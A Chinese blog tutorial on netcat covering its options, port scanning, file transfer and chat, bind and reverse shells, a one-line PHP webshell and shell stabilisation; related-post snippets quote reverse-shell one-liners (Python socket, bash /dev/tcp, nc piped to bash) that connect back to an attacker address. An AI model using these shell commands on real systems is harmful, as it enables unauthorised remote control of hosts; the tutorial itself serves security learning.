nc瑞士军刀与shell基础

已于 2024-02-18 01:48:12 修改
阅读量532 收藏 10
点赞数 10
文章标签: 安全
于 2024-02-18 01:34:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XYpangSJ/article/details/134657436
版权

nc是什么

nc 是一个Linux环境下常用的工具命令,可以用来帮助开发者查询和解决网路问题,通常被认为是 NetCat 工具的缩写,在网络工具中有“瑞士军刀”的美誉。

nc 在Linux环境下常常是自带的,如果你使用的Linux发行版本没有这个工具也可以自行安装,比如在CentOS上的安装命令就是 yum install nc -y,并且这个工具在Windows上也可以直接下载使用,下载页面地址为 netcat,简约而不简单。

原文链接:https://blog.csdn.net/albertsh/article/details/121896012

基本用法

┌──(root💀kali)-[~]
└─# nc -h                       
[v1.10-47]
connect to somewhere:   nc [-options] hostname port[s] [ports] ... 
listen for inbound:     nc -l -p port [-options] [hostname] [port]
options:
        -c shell commands       as `-e'; use /bin/sh to exec [dangerous!!]
        -e filename             program to exec after connect [dangerous!!]
        -b                      allow broadcasts
        -g gateway              source-routing hop point[s], up to 8
        -G num                  source-routing pointer: 4, 8, 12, ...
        -h                      this cruft
        -i secs                 delay interval for lines sent, ports scanned
        -k                      set keepalive option on socket
        -l                      listen mode, for inbound connects
        -n                      numeric-only IP addresses, no DNS
        -o file                 hex dump of traffic
        -p port                 local port number
        -r                      randomize local and remote ports
        -q secs                 quit after EOF on stdin and delay of secs
        -s addr                 local source address
        -T tos                  set Type Of Service
        -t                      answer TELNET negotiation
        -u                      UDP mode
        -v                      verbose [use twice to be more verbose]
        -w secs                 timeout for connects and final net reads
        -C                      Send CRLF as line-ending
        -z                      zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').

1)端口扫描

nc -v -z host.example.com 70-80            
#扫描端口(70到80),可指定范围。-v输出详细信息。

2) 远程拷贝文件

3) 简单聊天工具

在192.168.2.34上: nc -l 1234
在192.168.2.33上: nc 192.168.2.34 1234
使用ctrl+C(或D)退出。
 
 
在端口1234建立连接,互相发送输入

4) 保存Web页面

# while true; do nc -l -p 80 -q 1 < somepage.html; done

5) 控制(正向与反向)

【控制端】 :nc -nv ip 端口

【被控制端】:nc -lvp 端口 -c bash
#-c bash 连接后把bash给对方

6) 用nc反弹shell

反弹shell在线生成器:反弹shell命令在线生成器|🔰雨苁🔰 (ddosi.org)

简单的shell

door.php一句话木马

连蚁剑即可

优化shell(shell会限制键盘一些按键)

python:pthon -c "import pty;pty.spawn('/bin/bash')"

其他:/usr/bin/script -qc /bin/bash /dev/null

停止到后台: cturl z 

 

 转变为稳定shell: stty raw -echo;fg

kali中的php-reverse-shell

目录位置如下

XYpangSJ
关注
[ 隧道技术 ] 反弹shell的集中常见方式(一)nc反弹shell
qq_51577576的博客
08-03 1785
攻击者机器 192.168.3.27 和靶机 192.168.3.29 可以相互的访问,这个时候可以使用正向shell攻击者机器 192.168.3.27 不能直接访问靶机,但是靶机 192.168.3.29 可以访问攻击者的机器,这个时候使用反向shell。...
nc(瑞士军刀)的使用 kali配置源 netcat介绍 nmap简介 proxychains配置代理
anananajiushiwo的博客
07-07 1871
进入root权限,输入: (4条消息) kali安装及更换源(详解)_ter_ret的博客-CSDN博客_kali换源https://blog.csdn.net/qq_53030229/article/details/120414259输入签名: 输入apt-get updatenc可以侦听,传输模式nc -h可以查看用法1.实现连接通讯服务端 监听端口 nc -lnvp 99992.nc安装tar -zxvf netcat-0.7.1.tar.gzcd netcat-0.7.1.tar.gz查看是否有
NC瑞士军刀)反弹shell使用教程,实操演示,保姆级教学
2301_79015613的博客
03-14 1698
简介:nc瑞士军刀,通常被称为netcat或简称nc,是一个被誉为网络安全界的“瑞士军刀”的实用工具。它利用TCP或UDP协议的网络连接来读写数据,具有多种强大的功能,使用也相对简单,只需两台装有nc的PC,就可以进行各种网络操作。例如,通过监听特定端口,可以实现电子取证PC与电子取证设备之间的通信和数据同步。下面是nc的常用参数。
linux使用nc 反弹shell
qq_30890029的博客
04-20 512
但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决。本机【攻击机】开启nc监听:nc -lvnp 9999。受害机器反弹shell《两种常见反弹shell
反弹shell的方式——之NC反弹shell
最新发布
aihua002的博客
07-24 456
反弹shell是指在攻击机监听某个端口,然后通过目标连接攻击机监听的端口,在攻击机反弹得到目标机的shell。通常在目标网络有防火墙或者其他因素限制,导致无法持续控制目标,或者执行命令受阻等情况时需要进行反弹shell
nc的使用+反弹shell
2301_80366980的博客
02-18 968
记录学习linux中nc的使用,以及反弹shell仅供个人学习,如有冒犯请尽快联系。
记一次nc反弹shell
^_^
11-30 546
在kali虚拟机上用nc监听端口7777 nc -lvp 7777 在ubuntu虚拟机上用python脚本去反向连接 python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('?.?.?.?',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subproce
web渗透【12】nc 反弹shell
司徒荆的博客
06-14 555
web渗透【12】nc 反弹shell
kali linux渗透常用工具—NETCAT[瑞士军刀NC]
qq_41850110的博客
02-16 1175
NETCAT被誉为网络安全界的‘瑞士军刀’,初识或从事网络安全的人都不会陌生。 这是一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。 它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。 同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 NC–NATCAT(跨平台远程连接工...
瑞士军刀NC
My urban life
04-19 313
nc是网络调试的一款强大的工具,是用于处理TCP或UDP数据的通用实用程序,是黑客界的瑞士军刀 看看的常规用法: > tldr nc Netcat is a versatile utility for working with TCP or UDP data. More information: https://nmap.org/ncat - Listen on a specified...
工具篇-瑞士军刀nc
风羽墨客的博客
12-30 2565
nc.exe 被称为瑞士军刀。是一个好用稳定的连接系统后门的工具,同时也是一个网络调试和开发工具。
NC工具—文件传输&shell获取功能
weixin_44431280的博客
04-03 6768
NC工具—文件传输&shell获取功能 前言:此文主要对NC(NETCAT)工具的文件传输和SHELL获取功能进行学习记录,不对工具简介和基本功能进行赘述,可参考我的另一篇文章Web安全工具—nc瑞士军刀)持续更新 基础知识: 1,文件传输基础知识:linux下的输入重定向"<“和输出重定向”>"介绍 输入重定向: ...
Shell netcat / nc 命令
水木梵华
04-12 2545
Shell 中的netcat / nc 命令 1、概述 2、语法 3、用法示例 Shell 中的netcat / nc 命令 Note: 本篇中服务器地址使用的是服务器节点的主机名: yanta 和 node 1、概述 netcat 所做的就是在两台电脑之间建立链接并返回两个数据流,可以使用这个命令来传输数据文件等。不过今天主要说明这个命令在shell脚本中的使用,可...
shell命令使用nc传文件
每天进步一点点儿
12-14 2184
1、首先要在接受主机上启动命令 即在目的主机启动监听 nc -l 监听端口[ 未使用端口] &gt; 要接收的文件名   如 我们要传一个jar包 或者 tar.gz 包 nc -l 16666 &gt; test-0.0.1-SNAPSHOT.jar nc -l 14444 &gt; test.tar.gz  2、在源主机发起请求 nc 目的主机ip 目的端口 &lt; 要发送的...
Shell脚本编程--nc命令使用详解
Jay的博客
08-20 4477
linux nc命令使用详解 功能说明:功能强大的网络工具 语 法:nc [-hlnruz][-g<网关…>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>][-s<来源位址>][-v…][-w<超时秒数>][主机名称][通信端口…] 参 数: -g<网关> 设置路由器跃程通信网关,最丢哦可设置8个。 -G<指向器数目> 设置来源路由指向器,其数值为4的倍数。 -h
shell命令之nc所有用法+网络抓包
qq_30531921的博客
05-17 619
nc用法+总结
Shell 命令集合 网络通讯 】Linux 创建网络连接 nc命令 使用教程
探索C++编程的奥秘,分享深入的技术见解和实践,旨在激发读者创造力与解决问题的思维。
06-27 1657
nc命令是Linux系统中的一个网络工具,全称为netcat。它是一个简单的TCP/IP和UDP/IP套接字工具,可以用于创建任意的网络连接,发送和接收数据。
内网渗透(二)——连接shellNC网络数据传输
qq_61562251的博客
12-10 1584
一、连接shellwebshell的定义:web下的执行环境,shell是用于与操作系统进行交互的用户界面在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败,比如:硬件设备有防火墙、入侵检测系统、网站防火墙、端口被占用、权限不足等,一旦被防火墙拦截导致打草惊蛇、后期攻击相当繁琐。而被控制端主动向外发送的数据包通常都不会被拦截。二、反向shell1、工具:nc(netcat)nc,也称为netcat,是一款功能强大的网络工具,可以在网络上进行数据传输。
nc(netcat)网安的“瑞士军刀
michael_linux的博客,一个小小小学生。滴水穿石,步步为营,只为那刹那芳华。
12-12 595
Netcat 是一款简单的 Unix 工具,使用 UDP 和 TCP 协议。它是一个可靠的容易被其他程序所启用的后台操作工具,同时它也被用作网络的测试工具或黑客工具。使用它你可以轻易的建立任何连接。内建有很多实用的工具。
nc 正向shell基础命令
09-03
nc 正向shell基础命令是在目标机上执行以下命令,首先需要目标机安装nc。使用bash反弹方法,命令如下: bash -i >& /dev/tcp/ip/port 0>&1 [1] 另一种方法是使用nc命令进行正向反弹,命令如下: nc -l 4444|bash|nc 攻击机ip 攻击机port 这些命令可以用来建立一个正向shell,使得攻击机可以与目标机进行交互。请注意,在执行这些命令之前,需要先在攻击机上监听相应的端口。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [详解NC反弹shell的几种方法](https://download.csdn.net/download/weixin_38664159/14048091)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [正向shell和反弹shell](https://blog.csdn.net/weixin_45936149/article/details/123752352)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值